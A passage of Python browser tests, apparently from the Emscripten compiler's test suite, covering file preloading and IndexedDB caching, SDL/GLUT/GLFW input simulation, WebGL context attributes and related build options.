# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
if is_chrome() and extra_size >= 100 * 1024 * 1024:
self.skipTest('chrome bug')
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.c', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-sALLOW_MEMORY_GROWTH'], reporting=Reporting.JS_ONLY)
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_preload_caching_indexeddb_name(self):
self.set_setting('EXIT_RUNTIME')
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.c', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_multifile(self):
# a few files inside a directory
ensure_dir('subdirr/moar')
create_file('subdirr/data1.txt', '1214141516171819')
create_file('subdirr/moar/data2.txt', '3.14159265358979')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
assert(strcmp("3.14159265358979", buf) == 0);
return 0;
}
''')
# by individual files
self.btest_exit('main.c', args=['--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt'])
# by directory, and remove files to make sure
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--preload-file', 'subdirr', '-o', 'page.html'], reporting=Reporting.JS_ONLY)
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?exit:0')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(Path('subdirr/data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
default_shell = read_file(path_from_root('src/shell.html'))
create_file('shell.html', default_shell.replace('var Module = {', '''
var Module = {
locateFile: function(path, prefix) {
if (path.endsWith(".wasm")) {
return prefix + path;
} else {
return "cdn/" + path;
}
},
'''))
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
return 0;
}
''')
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.data', Path('cdn/test.data'))
self.run_browser('test.html', '', '/report_result?exit:0')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed, because the required dependency file will be missing.
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.disableErrorReporting = true;
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test that a missing file runs xhr.onload with a status other than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
@also_with_wasmfs
def test_dev_random(self):
self.btest_exit(Path('filesystem/dev_random.cpp'))
def test_sdl_swsurface(self):
self.btest_exit('sdl_swsurface.c', args=['-lSDL', '-lGL'])
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.btest_exit(src, args=[
'-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
@also_with_wasmfs
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.btest_exit(src, args=[
'-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
@parameterized({
'': ([],),
# add testing for closure on preloaded files + ENVIRONMENT=web (we must not
# emit any node.js code here, see
# https://github.com/emscripten-core/emscripten/issues/14486
'closure_webonly': (['--closure', '1', '-sENVIRONMENT=web'],)
})
def test_sdl_image_prepare_data(self, args):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'] + args, manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest_exit('sdl_stb_image_cleanup.c', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O0', '-sSAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O2', '-sSAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
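# post_manual_reftest injects reftest.js into the generated test.html and
# overrides window.close so that the pixel comparison (doReftest) runs after
# pending rAFs have updated the screen, shortly before the page closes; tests
# built with manual_reference=True rely on this hook.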
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-sGL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-sASSERTIONS', '-sSAFE_HEAP', '-sASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest_exit('canvas_focus.c')
def test_keydown_preventdefault_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-sEXPORTED_FUNCTIONS=_main'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
            element.value = ''; // reset the output textarea (browsers may restore its previous contents on reload)
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest_exit('glut_touchevents.c', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest_exit('glut_wheelevents.c', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
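    # Note: buttons are plain 0/1 numbers here; the test_sdl_joystick_2 variant below models
    # them as { pressed, value } objects per the later Editor's Draft.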
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
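    # Unlike the SDL joystick tests above, emscripten's GLFW backend presumably relies on the
    # 'gamepadconnected' event rather than only polling navigator.getGamepads(), so the
    # addNewGamepad below also dispatches that event (see the note inside the JS).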
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit(test_file('test_glfw_joystick.c'), args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-sUSE_GLFW=3'])
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
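    # The --js-library file above uses mergeInto(LibraryManager.library, ...) so that the
    # webgl*Supported() helpers become JS-implemented library functions the C test code can
    # call; each helper creates a throwaway canvas, requests a context with one attribute
    # enabled and reports whether getContextAttributes() confirms it.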
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.basename(filepath)
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl2.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-sUSE_SDL=2', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
    # perform tests with attributes deactivated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest_exit('webgl_error.cpp')
@requires_graphics_hardware
def test_webgl_parallel_shader_compile(self):
self.btest_exit('webgl_parallel_shader_compile.cpp')
@requires_graphics_hardware
def test_webgl_explicit_uniform_location(self):
self.btest_exit('webgl_explicit_uniform_location.c', args=['-sGL_EXPLICIT_UNIFORM_LOCATION=1', '-sMIN_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sampler_layout_binding(self):
self.btest_exit('webgl_sampler_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1'])
@requires_graphics_hardware
def test_webgl2_ubo_layout_binding(self):
self.btest_exit('webgl2_ubo_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1', '-sMIN_WEBGL_VERSION=2'])
# Test that -sGL_PREINITIALIZED_CONTEXT works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest_exit('preinitialized_webgl_context.cpp', args=['-sGL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-sUSE_PTHREADS'], ['-sENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest_exit('emscripten_get_now.cpp', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-sENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-sEXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
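  # The next test runs three builds against one persistent store: the first (-DFIRST) writes
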